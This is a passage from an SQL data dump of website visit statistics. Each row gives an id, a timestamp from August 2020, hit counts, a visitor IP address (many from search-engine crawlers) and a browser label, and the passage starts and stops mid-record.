,'176.226.202.226','firefox'),(530755,1597187533,3,3,0,0,'66.249.70.70','chrome'),(530756,1597187707,1,1,0,0,'66.249.64.38','chrome'),(530757,1597187927,8,8,0,0,'109.108.71.11','other'),(530758,1597188751,1,1,0,0,'77.74.177.113','chrome'),(530759,1597188830,1,1,0,0,'66.249.64.33','chrome'),(530760,1597188898,3,3,0,0,'66.249.64.38','chrome'),(530761,1597188991,2,2,0,0,'66.249.70.72','chrome'),(530762,1597189055,8,8,0,0,'109.108.71.11','other'),(530763,1597189772,1,1,0,0,'66.249.70.70','chrome'),(530764,1597189781,1,1,0,0,'66.249.70.69','chrome'),(530765,1597190013,1,1,0,0,'8.29.198.27','other'),(530766,1597190015,2,2,0,0,'66.249.70.72','chrome'),(530767,1597190108,1,1,0,0,'62.205.134.182','other'),(530768,1597190173,8,8,0,0,'109.108.71.11','other'),(530769,1597190288,1,1,0,0,'93.159.230.28','chrome'),(530770,1597190500,1,1,0,0,'66.249.64.33','chrome'),(530771,1597190909,7,7,0,0,'35.172.233.215','other'),(530772,1597191001,1,1,0,0,'66.249.70.69','chrome'),(530773,1597191061,2,2,0,0,'66.249.70.72','chrome'),(530774,1597191275,8,8,0,0,'109.108.71.11','other'),(530775,1597191691,1,1,0,0,'157.55.39.54','other'),(530776,1597191888,6,6,0,0,'35.172.233.215','other'),(530777,1597191951,1,1,0,0,'93.159.230.28','chrome'),(530778,1597192402,2,2,0,0,'66.249.70.72','chrome'),(530779,1597192461,8,8,0,0,'109.108.71.11','other'),(530780,1597192562,3,3,0,0,'66.249.70.69','chrome'),(530781,1597192675,1,1,0,0,'5.255.253.136','other'),(530782,1597192811,1,1,0,0,'66.249.70.70','chrome'),(530783,1597193139,10,10,0,0,'35.172.233.215','other'),(530784,1597193590,2,2,0,0,'66.249.64.36','chrome'),(530785,1597193646,8,8,0,0,'109.108.71.11','other'),(530786,1597193721,2,2,0,0,'66.249.70.69','chrome'),(530787,1597193906,1,1,0,0,'66.249.70.72','chrome'),(530788,1597194042,2,2,0,0,'77.74.177.113','chrome'),(530789,1597194074,6,6,0,0,'35.172.233.215','other'),(530790,1597194812,8,8,0,0,'109.108.71.11','other'),(530791,1597195066,2,2,0,0,'66.249.70.70','chrome'),(530792,1597195136,9,9,0,0,'35.172.233.215','other'),(530793,1597195347,1,1,0,0,'52.32.116.128','chrome'),(530794,1597195379,1,1,0,0,'34.219.11.4','other'),(530795,1597195832,2,2,0,0,'66.249.70.72','chrome'),(530796,1597195936,8,8,0,0,'109.108.71.11','other'),(530797,1597196085,3,3,0,0,'66.249.70.69','chrome'),(530798,1597196186,1,1,0,0,'66.249.64.33','chrome'),(530799,1597196198,1,1,0,0,'157.55.39.138','other'),(530800,1597196296,9,9,0,0,'35.172.233.215','other'),(530801,1597196418,1,1,0,0,'66.249.70.70','chrome'),(530802,1597197034,8,8,0,0,'109.108.71.11','other'),(530803,1597197206,9,9,0,0,'35.172.233.215','other'),(530804,1597197442,2,2,0,0,'66.249.70.69','chrome'),(530805,1597197513,1,1,0,0,'207.46.13.231','other'),(530806,1597198181,8,8,0,0,'109.108.71.11','other'),(530807,1597198199,3,3,0,0,'66.249.70.70','chrome'),(530808,1597198232,1,1,0,0,'66.249.64.36','chrome'),(530809,1597198889,1,1,0,0,'66.249.70.69','chrome'),(530810,1597198995,3,3,0,0,'66.249.70.72','chrome'),(530811,1597199330,8,8,0,0,'109.108.71.11','other'),(530812,1597199551,2,2,0,0,'66.249.70.70','chrome'),(530813,1597199657,1,1,0,0,'178.154.200.19','other'),(530814,1597199968,1,1,0,0,'66.249.64.38','chrome'),(530815,1597200338,1,1,0,0,'66.249.70.69','chrome'),(530816,1597200479,8,8,0,0,'109.108.71.11','other'),(530817,1597200712,1,1,0,0,'5.45.207.174','other'),(530818,1597200835,1,1,0,0,'8.29.198.27','other'),(530819,1597201297,1,1,0,0,'66.249.70.70','chrome'),(530820,1597201640,8,8,0,0,'109.108.71.11','other'),(530821,1597201929,1,1,0,0,'66.249.70.72','chrome'),(530822,1597202362,1,1,0,0,'5.255.253.183','other'),(530823,1597202757,8,8,0,0,'109.108.71.11','other'),(530824,1597203597,1,1,0,0,'5.45.207.92','other'),(530825,1597203895,1,1,0,0,'178.154.200.115','other'),(530826,1597203921,8,8,0,0,'109.108.71.11','other'),(530827,1597204957,1,1,0,0,'66.249.70.69','chrome'),(530828,1597205010,8,8,0,0,'109.108.71.11','other'),(530829,1597205041,2,2,0,0,'5.45.207.174','other'),(530830,1597205425,2,2,0,0,'66.249.70.72','chrome'),(530831,1597206349,1,1,0,0,'66.249.64.38','chrome'),(530832,1597207295,1,1,0,0,'131.220.6.152','chrome'),(530833,1597207343,1,1,0,0,'66.249.70.69','chrome'),(530834,1597207368,1,1,0,0,'66.249.64.33','chrome'),(530835,1597207445,8,8,0,0,'109.108.71.11','other'),(530836,1597207853,1,1,0,0,'66.249.70.70','chrome'),(530837,1597208129,1,1,0,0,'62.205.134.182','other'),(530838,1597208639,8,8,0,0,'109.108.71.11','other'),(530839,1597208651,2,2,0,0,'66.249.70.72','chrome'),(530840,1597208984,2,2,0,0,'34.219.228.117','other'),(530841,1597209071,1,1,0,0,'66.249.70.69','chrome'),(530842,1597209733,8,8,0,0,'109.108.71.11','other'),(530843,1597209975,1,1,0,0,'66.249.70.72','chrome'),(530844,1597210128,1,1,0,0,'66.249.64.38','chrome'),(530845,1597210509,1,1,0,0,'66.249.64.36','chrome'),(530846,1597210888,8,8,0,0,'109.108.71.11','other'),(530847,1597211528,1,1,0,0,'95.174.220.112','chrome'),(530848,1597211662,1,1,0,0,'8.29.198.25','other'),(530849,1597212007,8,8,0,0,'109.108.71.11','other'),(530850,1597212762,2,2,0,0,'66.249.70.70','chrome'),(530851,1597213183,8,8,0,0,'109.108.71.11','other'),(530852,1597213670,2,2,0,0,'66.249.70.72','chrome'),(530853,1597213964,1,1,0,0,'66.249.70.70','chrome'),(530854,1597214654,1,1,0,0,'157.55.39.52','other'),(530855,1597215092,2,2,0,0,'178.154.200.112','other'),(530856,1597215274,2,2,0,0,'66.249.70.70','chrome'),(530857,1597215405,1,1,0,0,'178.154.200.105','other'),(530858,1597215782,2,2,0,0,'5.45.207.174','other'),(530859,1597216301,1,1,0,0,'66.249.70.70','chrome'),(530860,1597216338,1,1,0,0,'109.108.71.11','other'),(530861,1597216410,1,1,0,0,'66.249.64.33','chrome'),(530862,1597217338,8,8,0,0,'109.108.71.11','other'),(530863,1597217832,1,1,0,0,'66.249.70.72','chrome'),(530864,1597218446,8,8,0,0,'109.108.71.11','other'),(530865,1597218487,2,2,0,0,'91.196.178.72','chrome'),(530866,1597218488,1,1,0,0,'77.111.247.65','chrome'),(530867,1597219292,2,2,0,0,'207.46.13.152','other'),(530868,1597219509,8,8,0,0,'109.108.71.11','other'),(530869,1597219868,2,2,0,0,'66.249.70.72','chrome'),(530870,1597220186,1,1,0,0,'91.196.177.46','chrome'),(530871,1597220220,3,3,0,0,'66.249.70.70','chrome'),(530872,1597220611,8,8,0,0,'109.108.71.11','other'),(530873,1597220772,1,1,0,0,'66.249.70.72','chrome'),(530874,1597220857,1,1,0,0,'91.196.178.79','chrome'),(530875,1597221118,2,2,0,0,'91.196.178.72','chrome'),(530876,1597221691,8,8,0,0,'109.108.71.11','other'),(530877,1597221713,5,5,0,0,'66.249.70.70','chrome'),(530878,1597222012,1,1,0,0,'66.249.64.36','chrome'),(530879,1597222040,3,3,0,0,'91.196.178.167','chrome'),(530880,1597222062,2,2,0,0,'91.196.178.72','chrome'),(530881,1597222487,1,1,0,0,'8.29.198.25','other'),(530882,1597222795,8,8,0,0,'109.108.71.11','other'),(530883,1597223110,3,3,0,0,'66.249.70.69','chrome'),(530884,1597223279,1,1,0,0,'66.249.64.36','chrome'),(530885,1597223396,2,2,0,0,'66.249.70.70','chrome'),(530886,1597223402,2,2,0,0,'91.196.178.143','chrome'),(530887,1597223453,1,1,0,0,'207.46.13.231','other'),(530888,1597223671,1,1,0,0,'37.73.169.12','chrome'),(530889,1597223791,1,1,0,0,'91.196.178.72','chrome'),(530890,1597223874,8,8,0,0,'109.108.71.11','other'),(530891,1597223985,1,1,0,0,'91.196.177.46','chrome'),(530892,1597224761,1,1,0,0,'66.249.64.33','chrome'),(530893,1597224984,8,8,0,0,'109.108.71.11','other'),(530894,1597225091,1,1,0,0,'66.249.70.72','chrome'),(530895,1597225112,1,1,0,0,'5.255.253.136','other'),(530896,1597225135,2,2,0,0,'66.249.70.69','chrome'),(530897,1597225178,3,3,0,0,'66.249.70.70','chrome'),(530898,1597225309,1,1,0,0,'66.249.64.38','chrome'),(530899,1597225411,2,2,0,0,'91.196.178.72','chrome'),(530900,1597225637,7,7,0,0,'94.130.9.183','other'),(530901,1597225850,1,1,0,0,'91.196.177.46','chrome'),(530902,1597225917,1,1,0,0,'31.13.127.22','other'),(530903,1597225920,1,1,0,0,'31.13.127.120','other'),(530904,1597225921,1,1,0,0,'31.13.103.12','other'),(530905,1597225922,1,1,0,0,'31.13.127.15','other'),(530906,1597225953,1,1,0,0,'31.13.127.119','other'),(530907,1597226033,1,1,0,0,'91.196.178.131','chrome'),(530908,1597226088,1,1,0,0,'94.153.71.95','chrome'),(530909,1597226102,8,8,0,0,'109.108.71.11','other'),(530910,1597226166,1,1,0,0,'37.73.102.51','chrome'),(530911,1597226228,1,1,0,0,'94.153.27.102','other'),(530912,1597226366,1,1,0,0,'66.249.70.69','chrome'),(530913,1597226374,1,1,0,0,'91.196.178.72','chrome'),(530914,1597226419,1,1,0,0,'91.196.178.177','chrome'),(530915,1597226501,1,1,0,0,'91.196.178.79','chrome'),(530916,1597226505,1,1,0,0,'3.235.227.100','chrome'),(530917,1597226561,7,7,0,0,'94.130.9.183','other'),(530918,1597226845,2,2,0,0,'91.196.177.46','chrome'),(530919,1597226918,1,1,0,0,'46.211.13.154','other'),(530920,1597227143,1,1,0,0,'46.211.30.1','other'),(530921,1597227246,8,8,0,0,'109.108.71.11','other'),(530922,1597227483,3,3,0,0,'94.130.9.183','other'),(530923,1597227494,1,1,0,0,'66.249.64.36','chrome'),(530924,1597227728,2,2,0,0,'66.249.70.69','chrome'),(530925,1597228093,1,1,0,0,'91.196.178.175','chrome'),(530926,1597228195,1,1,0,0,'94.179.208.59','chrome'),(530927,1597228387,8,8,0,0,'109.108.71.11','other'),(530928,1597228483,2,2,0,0,'78.111.209.232','chrome'),(530929,1597228790,1,1,0,0,'66.249.70.70','chrome'),(530930,1597228831,1,1,0,0,'66.249.70.69','chrome'),(530931,1597228902,1,1,0,0,'91.196.178.1','chrome'),(530932,1597229004,1,1,0,0,'37.73.217.227','chrome'),(530933,1597229217,1,1,0,0,'178.95.67.134','chrome'),(530934,1597229479,8,8,0,0,'109.108.71.11','other'),(530935,1597229899,2,2,0,0,'66.249.70.70','chrome'),(530936,1597229977,1,1,0,0,'5.45.207.174','other'),(530937,1597230118,1,1,0,0,'46.133.87.169','other'),(530938,1597230409,1,1,0,0,'109.74.154.72','chrome'),(530939,1597230502,1,1,0,0,'66.249.64.38','chrome'),(530940,1597230577,8,8,0,0,'109.108.71.11','other'),(530941,1597230788,1,1,0,0,'66.249.64.36','chrome'),(530942,1597230853,2,2,0,0,'66.249.70.72','chrome'),(530943,1597231003,2,2,0,0,'95.213.141.126','opera'),(530944,1597231125,1,1,0,0,'157.55.39.52','other'),(530945,1597231224,2,2,0,0,'91.196.178.57','chrome'),(530946,1597231680,8,8,0,0,'109.108.71.11','other'),(530947,1597232404,1,1,0,0,'91.196.178.57','chrome'),(530948,1597232601,1,1,0,0,'91.196.178.72','chrome'),(530949,1597232608,1,1,0,0,'66.249.70.70','chrome'),(530950,1597232835,8,8,0,0,'109.108.71.11','other'),(530951,1597233259,1,1,0,0,'46.175.248.142','chrome'),(530952,1597233317,1,1,0,0,'8.29.198.27','other'),(530953,1597233432,1,1,0,0,'157.55.39.93','other'),(530954,1597233853,1,1,0,0,'5.45.207.92','other'),(530955,1597233917,8,8,0,0,'109.108.71.11','other'),(530956,1597234199,1,1,0,0,'66.249.70.69','chrome'),(530957,1597234358,1,1,0,0,'80.95.44.96','chrome'),(530958,1597234544,1,1,0,0,'66.220.149.116','other'),(530959,1597234545,1,1,0,0,'66.220.149.10','other'),(530960,1597234689,1,1,0,0,'91.196.178.72','chrome'),(530961,1597234834,2,2,0,0,'66.249.70.72','chrome'),(530962,1597235121,8,8,0,0,'109.108.71.11','other'),(530963,1597235254,1,1,0,0,'91.196.178.84','chrome'),(530964,1597235410,1,1,0,0,'46.175.248.142','chrome'),(530965,1597235558,1,1,0,0,'91.196.178.1','chrome'),(530966,1597235791,2,2,0,0,'91.196.178.72','chrome'),(530967,1597236215,1,1,0,0,'109.108.71.11','other'),(530968,1597236219,2,2,0,0,'66.249.70.70','chrome'),(530969,1597236644,1,1,0,0,'91.196.178.180','chrome'),(530970,1597236698,1,1,0,0,'91.196.178.72','chrome'),(530971,1597236972,1,1,0,0,'66.249.64.33','chrome'),(530972,1597237171,1,1,0,0,'91.196.178.169','firefox'),(530973,1597237337,1,1,0,0,'157.55.39.52','other'),(530974,1597237344,8,8,0,0,'109.108.71.11','other'),(530975,1597237466,1,1,0,0,'173.252.95.29','other'),(530976,1597237513,1,1,0,0,'5.45.207.92','other'),(530977,1597237600,1,1,0,0,'91.196.178.72','chrome'),(530978,1597237800,1,1,0,0,'66.249.70.69','chrome'),(530979,1597238520,8,8,0,0,'109.108.71.11','other'),(530980,1597238524,4,4,0,0,'91.196.178.72','chrome'),(530981,1597238819,1,1,0,0,'66.249.64.38','chrome'),(530982,1597238876,1,1,0,0,'66.249.70.72','chrome'),(530983,1597239426,1,1,0,0,'91.196.178.72','chrome'),(530984,1597239443,1,1,0,0,'66.249.70.69','chrome'),(530985,1597239702,8,8,0,0,'109.108.71.11','other'),(530986,1597240245,1,1,0,0,'91.196.178.84','chrome'),(530987,1597240366,1,1,0,0,'91.196.178.72','chrome'),(530988,1597240639,1,1,0,0,'66.249.70.72','chrome'),(530989,1597240651,1,1,0,0,'88.155.81.230','chrome'),(530990,1597240782,1,1,0,0,'31.13.127.8','other'),(530991,1597240848,8,8,0,0,'109.108.71.11','other'),(530992,1597240893,1,1,0,0,'66.249.70.70','chrome'),(530993,1597240919,1,1,0,0,'66.249.70.69','chrome'),(530994,1597241098,1,1,0,0,'66.249.64.33','chrome'),(530995,1597241283,1,1,0,0,'66.249.64.36','chrome'),(530996,1597241687,1,1,0,0,'178.154.200.120','other'),(530997,1597241879,2,2,0,0,'66.249.70.72','chrome'),(530998,1597241944,1,1,0,0,'66.249.70.69','chrome'),(530999,1597241990,8,8,0,0,'109.108.71.11','other'),(531000,1597242898,1,0,1,0,'66.249.70.70',''),(531001,1597243030,1,1,0,0,'66.249.70.72','chrome'),(531002,1597243146,8,8,0,0,'109.108.71.11','other'),(531003,1597243622,1,1,0,0,'91.196.177.46','chrome'),(531004,1597244150,1,1,0,0,'8.29.198.26','other'),(531005,1597244260,8,8,0,0,'109.108.71.11','other'),(531006,1597244357,34,34,0,0,'66.249.70.69','chrome'),(531007,1597245131,1,0,1,0,'66.249.70.70',''),(531008,1597245135,7,7,0,0,'66.249.70.70','chrome'),(531009,1597245148,1,1,0,0,'91.196.178.123','chrome'),(531010,1597245258,18,18,0,0,'66.249.70.69','chrome'),(531011,1597245369,8,8,0,0,'109.108.71.11','other'),(531012,1597245424,1,1,0,0,'66.249.70.72','chrome'),(531013,1597245626,1,1,0,0,'66.220.149.25','other'),(531014,1597245687,1,1,0,0,'157.55.39.78','other'),(531015,1597246048,2,2,0,0,'66.249.70.70','chrome'),(531016,1597246110,7,7,0,0,'188.163.76.65','chrome'),(531017,1597246323,2,2,0,0,'66.249.70.69','chrome'),(531018,1597246492,8,8,0,0,'109.108.71.11','other'),(531019,1597246508,2,2,0,0,'66.249.70.72','chrome'),(531020,1597247624,8,8,0,0,'109.108.71.11','other'),(531021,1597248116,1,1,0,0,'207.46.13.61','other'),(531022,1597248522,3,3,0,0,'66.249.70.69','chrome'),(531023,1597248611,1,1,0,0,'209.17.96.122','other'),(531024,1597248724,8,8,0,0,'109.108.71.11','other'),(531025,1597248927,1,1,0,0,'66.249.64.38','chrome'),(531026,1597249112,1,1,0,0,'66.249.70.72','chrome'),(531027,1597249717,1,1,0,0,'157.55.39.188','other'),(531028,1597249765,1,0,1,0,'66.249.70.69',''),(531029,1597249794,1,1,0,0,'46.211.65.161','chrome'),(531030,1597249834,8,8,0,0,'109.108.71.11','other'),(531031,1597250041,1,1,0,0,'66.249.70.72','chrome'),(531032,1597250194,2,2,0,0,'66.249.70.69','chrome'),(531033,1597250934,8,8,0,0,'109.108.71.11','other'),(531034,1597250979,2,2,0,0,'207.46.13.231','other'),(531035,1597251167,2,2,0,0,'66.249.70.69','chrome'),(531036,1597252051,8,8,0,0,'109.108.71.11','other'),(531037,1597252156,1,1,0,0,'66.249.70.69','chrome'),(531038,1597252199,2,2,0,0,'66.249.70.70','chrome'),(531039,1597252210,1,1,0,0,'66.249.64.36','chrome'),(531040,1597252449,1,1,0,0,'185.23.107.220','chrome'),(531041,1597253137,8,8,0,0,'109.108.71.11','other'),(531042,1597253538,1,1,0,0,'66.249.64.36','chrome'),(531043,1597253627,1,1,0,0,'66.249.70.69','chrome'),(531044,1597254226,8,8,0,0,'109.108.71.11','other'),(531045,1597254324,1,1,0,0,'66.249.70.72','chrome'),(531046,1597254353,1,1,0,0,'66.249.70.70','chrome'),(531047,1597254980,1,1,0,0,'8.29.198.25','other'),(531048,1597255011,1,1,0,0,'91.196.178.1','chrome'),(531049,1597255291,8,8,0,0,'109.108.71.11','other'),(531050,1597255814,3,3,0,0,'66.249.70.70','chrome'),(531051,1597255862,1,1,0,0,'5.45.207.174','other'),(531052,1597255912,1,1,0,0,'66.249.70.69','chrome'),(531053,1597255972,1,1,0,0,'178.154.200.112','other'),(531054,1597256025,1,1,0,0,'66.249.64.33','chrome'),(531055,1597256370,8,8,0,0,'109.108.71.11','other'),(531056,1597256854,4,4,0,0,'66.249.70.69','chrome'),(531057,1597257115,1,1,0,0,'66.249.64.38','chrome'),(531058,1597257205,2,2,0,0,'66.249.70.72','chrome'),(531059,1597257301,1,1,0,0,'66.249.70.70','chrome'),(531060,1597257444,8,8,0,0,'109.108.71.11','other'),(531061,1597257756,1,1,0,0,'69.171.251.26','other'),(531062,1597257892,1,1,0,0,'5.45.207.92','other'),(531063,1597258091,3,3,0,0,'66.249.70.69','chrome'),(531064,1597258525,8,8,0,0,'109.108.71.11','other'),(531065,1597258654,1,1,0,0,'88.99.2.203','other'),(531066,1597258662,7,7,0,0,'136.243.70.68','other'),(531067,1597258872,1,1,0,0,'66.249.64.38','chrome'),(531068,1597258921,1,1,0,0,'66.249.70.70','chrome'),(531069,1597259180,1,1,0,0,'66.249.64.33','chrome'),(531070,1597259406,2,2,0,0,'66.249.70.69','chrome'),(531071,1597259651,8,8,0,0,'109.108.71.11','other'),(531072,1597260048,1,1,0,0,'88.155.148.251','chrome'),(531073,1597260237,2,2,0,0,'66.249.70.72','chrome'),(531074,1597260375,1,0,1,0,'66.249.70.70',''),(531075,1597260403,4,4,0,0,'66.249.70.69','chrome'),(531076,1597260504,2,2,0,0,'66.249.70.70','chrome'),(531077,1597260578,1,1,0,0,'178.154.200.112','other'),(531078,1597260827,8,8,0,0,'109.108.71.11','other'),(531079,1597260888,1,1,0,0,'207.46.13.46','other'),(531080,1597261305,2,2,0,0,'66.249.70.69','chrome'),(531081,1597261564,5,5,0,0,'66.249.70.70','chrome'),(531082,1597261922,8,8,0,0,'109.108.71.11','other'),(531083,1597262232,2,2,0,0,'66.249.70.72','chrome'),(531084,1597262327,1,1,0,0,'91.196.121.156','chrome'),(531085,1597262540,2,2,0,0,'66.249.70.69','chrome'),(531086,1597262620,1,1,0,0,'5.45.207.174','other'),(531087,1597262784,21,21,0,0,'89.248.174.39','msie'),(531088,1597263023,8,8,0,0,'109.108.71.11','other'),(531089,1597263281,2,2,0,0,'66.249.64.38','chrome'),(531090,1597263387,4,4,0,0,'66.249.70.72','chrome'),(531091,1597263529,1,1,0,0,'66.249.70.69','chrome'),(531092,1597263721,2,2,0,0,'66.249.70.70','chrome'),(531093,1597264117,8,8,0,0,'109.108.71.11','other'),(531094,1597264523,2,2,0,0,'66.249.70.69','chrome'),(531095,1597264727,2,2,0,0,'66.249.70.70','chrome'),(531096,1597264877,2,2,0,0,'66.249.70.72','chrome'),(531097,1597265181,8,8,0,0,'109.108.71.11','other'),(531098,1597265464,3,3,0,0,'91.196.178.58','chrome'),(531099,1597265622,3,3,0,0,'66.249.64.33','chrome'),(531100,1597265794,1,1,0,0,'66.249.70.69','chrome'),(531101,1597265807,1,1,0,0,'8.29.198.25','other'),(531102,1597265839,2,2,0,0,'66.249.70.70','chrome'),(531103,1597266237,8,8,0,0,'109.108.71.11','other'),(531104,1597266453,1,1,0,0,'157.55.39.175','other'),(531105,1597266586,1,1,0,0,'66.249.64.33','chrome'),(531106,1597266639,1,1,0,0,'207.46.13.61','other'),(531107,1597266866,1,1,0,0,'66.249.70.72','chrome'),(531108,1597267313,8,8,0,0,'109.108.71.11','other'),(531109,1597267520,1,1,0,0,'66.249.64.38','chrome'),(531110,1597267610,1,1,0,0,'178.154.200.36','other'),(531111,1597267839,1,1,0,0,'66.249.70.70','chrome'),(531112,1597267852,2,2,0,0,'66.249.70.69','chrome'),(531113,1597267963,1,1,0,0,'5.45.207.174','other'),(531114,1597267979,2,2,0,0,'66.249.70.72','chrome'),(531115,1597268007,1,1,0,0,'207.46.13.119','other'),(531116,1597268134,1,1,0,0,'207.46.13.61','other'),(531117,1597268378,8,8,0,0,'109.108.71.11','other'),(531118,1597268735,1,1,0,0,'66.249.64.38','chrome'),(531119,1597269272,1,1,0,0,'66.249.64.33','chrome'),(531120,1597269483,8,8,0,0,'109.108.71.11','other'),(531121,1597269544,1,1,0,0,'66.249.70.72','chrome'),(531122,1597269640,2,2,0,0,'66.249.70.70','chrome'),(531123,1597269664,1,1,0,0,'66.249.64.38','chrome'),(531124,1597270566,8,8,0,0,'109.108.71.11','other'),(531125,1597270885,2,2,0,0,'66.249.70.72','chrome'),(531126,1597271669,8,8,0,0,'109.108.71.11','other'),(531127,1597272711,8,8,0,0,'109.108.71.11','other'),(531128,1597272807,2,2,0,0,'66.249.70.70','chrome'),(531129,1597272850,2,2,0,0,'66.249.70.72','chrome'),(531130,1597273695,1,1,0,0,'66.249.70.69','chrome'),(531131,1597273803,1,1,0,0,'178.154.200.28','other'),(531132,1597273810,8,8,0,0,'109.108.71.11','other'),(531133,1597274055,1,1,0,0,'66.249.70.70','chrome'),(531134,1597274096,1,1,0,0,'66.249.64.38','chrome'),(531135,1597274797,1,1,0,0,'178.154.200.51','other'),(531136,1597274916,8,8,0,0,'109.108.71.11','other'),(531137,1597275770,1,1,0,0,'173.252.111.112','other'),(531138,1597275976,8,8,0,0,'109.108.71.11','other'),(531139,1597276109,4,4,0,0,'66.249.70.70','chrome'),(531140,1597276253,1,1,0,0,'5.255.253.151','chrome'),(531141,1597276277,1,1,0,0,'5.45.207.174','other'),(531142,1597276278,1,1,0,0,'5.45.207.135','other'),(531143,1597276440,1,1,0,0,'134.19.179.235','firefox'),(531144,1597276508,1,1,0,0,'62.205.134.182','other'),(531145,1597276512,1,1,0,0,'88.99.2.203','other'),(531146,1597276513,7,7,0,0,'136.243.70.68','other'),(531147,1597276632,1,1,0,0,'8.29.198.26','other'),(531148,1597276866,1,1,0,0,'5.255.253.88','other'),(531149,1597276913,4,4,0,0,'66.249.70.69','chrome'),(531150,1597277041,2,2,0,0,'66.249.70.72','chrome'),(531151,1597277055,8,8,0,0,'109.108.71.11','other'),(531152,1597278011,1,1,0,0,'66.249.70.69','chrome'),(531153,1597278117,8,8,0,0,'109.108.71.11','other'),(531154,1597279045,1,1,0,0,'66.249.70.72','chrome'),(531155,1597279097,3,3,0,0,'66.249.70.70','chrome'),(531156,1597279206,8,8,0,0,'109.108.71.11','other'),(531157,1597280096,1,1,0,0,'66.249.70.70','chrome'),(531158,1597280309,8,8,0,0,'109.108.71.11','other'),(531159,1597280824,1,1,0,0,'66.249.70.72','chrome'),(531160,1597281386,8,8,0,0,'109.108.71.11','other'),(531161,1597281638,2,2,0,0,'66.249.70.70','chrome'),(531162,1597281726,1,1,0,0,'66.249.70.69','chrome'),(531163,1597282274,1,1,0,0,'5.45.207.174','other'),(531164,1597282445,8,8,0,0,'109.108.71.11','other'),(531165,1597283157,1,1,0,0,'5.45.207.134','other'),(531166,1597283508,8,8,0,0,'109.108.71.11','other'),(531167,1597283633,1,1,0,0,'193.106.30.99','firefox'),(531168,1597284038,1,1,0,0,'178.154.200.36','other'),(531169,1597284192,1,1,0,0,'66.249.64.33','chrome'),(531170,1597284582,8,8,0,0,'109.108.71.11','other'),(531171,1597284840,2,2,0,0,'66.249.70.72','chrome'),(531172,1597284968,1,1,0,0,'66.249.64.38','chrome'),(531173,1597285181,1,1,0,0,'178.214.247.246','msie'),(531174,1597285344,1,1,0,0,'157.55.39.91','other'),(531175,1597285645,8,8,0,0,'109.108.71.11','other'),(531176,1597286131,1,1,0,0,'66.249.70.70','chrome'),(531177,1597286529,1,1,0,0,'66.249.64.36','chrome'),(531178,1597286708,8,8,0,0,'109.108.71.11','other'),(531179,1597287409,1,1,0,0,'66.249.70.69','chrome'),(531180,1597287452,1,1,0,0,'8.29.198.25','other'),(531181,1597287551,3,3,0,0,'66.249.70.70','chrome'),(531182,1597287673,2,2,0,0,'66.249.70.72','chrome'),(531183,1597287778,8,8,0,0,'109.108.71.11','other'),(531184,1597287908,1,1,0,0,'66.249.64.38','chrome'),(531185,1597287978,1,1,0,0,'66.249.64.36','chrome'),(531186,1597288091,1,1,0,0,'5.45.207.174','other'),(531187,1597288843,8,8,0,0,'109.108.71.11','other'),(531188,1597288913,2,2,0,0,'66.249.70.70','chrome'),(531189,1597289147,4,4,0,0,'66.249.70.72','chrome'),(531190,1597289518,2,2,0,0,'66.249.70.69','chrome'),(531191,1597289895,8,8,0,0,'109.108.71.11','other'),(531192,1597290599,1,0,1,0,'66.249.70.69',''),(531193,1597290662,1,1,0,0,'157.55.39.230','other'),(531194,1597290763,1,1,0,0,'66.249.70.69','chrome'),(531195,1597290991,8,8,0,0,'109.108.71.11','other'),(531196,1597291136,1,1,0,0,'66.249.70.70','chrome'),(531197,1597291207,1,1,0,0,'66.249.64.33','chrome'),(531198,1597291725,2,2,0,0,'66.249.70.69','chrome'),(531199,1597292090,8,8,0,0,'109.108.71.11','other'),(531200,1597292109,1,1,0,0,'66.249.64.33','chrome'),(531201,1597292738,1,1,0,0,'66.249.70.69','chrome'),(531202,1597292896,2,2,0,0,'66.249.70.70','chrome'),(531203,1597293247,1,1,0,0,'157.55.39.175','other'),(531204,1597293426,1,1,0,0,'131.220.6.152','chrome'),(531205,1597294367,2,2,0,0,'66.249.70.72','chrome'),(531206,1597294438,4,4,0,0,'66.249.70.69','chrome'),(531207,1597294513,1,1,0,0,'62.205.134.182','other'),(531208,1597294588,3,3,0,0,'66.249.70.70','chrome'),(531209,1597295079,8,8,0,0,'109.108.71.11','other'),(531210,1597296154,8,8,0,0,'109.108.71.11','other'),(531211,1597296356,4,4,0,0,'66.249.70.76','chrome'),(531212,1597296509,4,4,0,0,'66.249.70.80','chrome'),(531213,1597296530,4,4,0,0,'66.249.70.78','chrome'),(531214,1597296819,1,1,0,0,'173.252.95.25','other'),(531215,1597296867,1,1,0,0,'130.180.210.172','chrome'),(531216,1597297021,1,1,0,0,'5.255.253.105','other'),(531217,1597297267,8,8,0,0,'109.108.71.11','other'),(531218,1597297321,1,1,0,0,'66.249.64.60','chrome'),(531219,1597297378,1,1,0,0,'66.249.64.58','chrome'),(531220,1597297505,1,1,0,0,'207.46.13.119','other'),(531221,1597297910,3,3,0,0,'66.249.70.80','chrome'),(531222,1597297948,1,1,0,0,'157.55.39.215','other'),(531223,1597298283,1,1,0,0,'8.29.198.27','other'),(531224,1597298346,8,8,0,0,'109.108.71.11','other'),(531225,1597298532,1,1,0,0,'91.196.178.72','chrome'),(531226,1597298593,2,2,0,0,'66.249.70.76','chrome'),(531227,1597298666,1,1,0,0,'5.255.253.88','other'),(531228,1597298762,3,3,0,0,'66.249.70.78','chrome'),(531229,1597298961,1,1,0,0,'93.183.201.147','chrome'),(531230,1597299010,1,1,0,0,'66.249.64.56','chrome'),(531231,1597299122,2,2,0,0,'66.249.70.80','chrome'),(531232,1597299412,8,8,0,0,'109.108.71.11','other'),(531233,1597299713,1,1,0,0,'91.196.178.169','chrome'),(531234,1597300122,4,4,0,0,'66.249.70.78','chrome'),(531235,1597300544,8,8,0,0,'109.108.71.11','other'),(531236,1597300738,3,3,0,0,'66.249.70.80','chrome'),(531237,1597301663,8,8,0,0,'109.108.71.11','other'),(531238,1597301729,1,1,0,0,'91.196.178.72','chrome'),(531239,1597301735,1,1,0,0,'31.13.127.117','other'),(531240,1597301754,1,1,0,0,'66.249.70.80','chrome'),(531241,1597302081,6,6,0,0,'66.249.70.78','chrome'),(531242,1597302465,1,1,0,0,'66.249.64.60','chrome'),(531243,1597302721,1,1,0,0,'66.249.64.56','chrome'),(531244,1597302749,8,8,0,0,'109.108.71.11','other'),(531245,1597302931,4,4,0,0,'66.249.70.80','chrome'),(531246,1597303403,1,1,0,0,'157.55.39.175','other'),(531247,1597303531,4,4,0,0,'66.249.70.76','chrome'),(531248,1597303592,1,1,0,0,'178.154.200.19','other'),(531249,1597303667,1,1,0,0,'157.55.39.225','other'),(531250,1597303796,1,1,0,0,'157.55.39.55','other'),(531251,1597303828,3,3,0,0,'176.105.98.90','chrome'),(531252,1597303845,3,3,0,0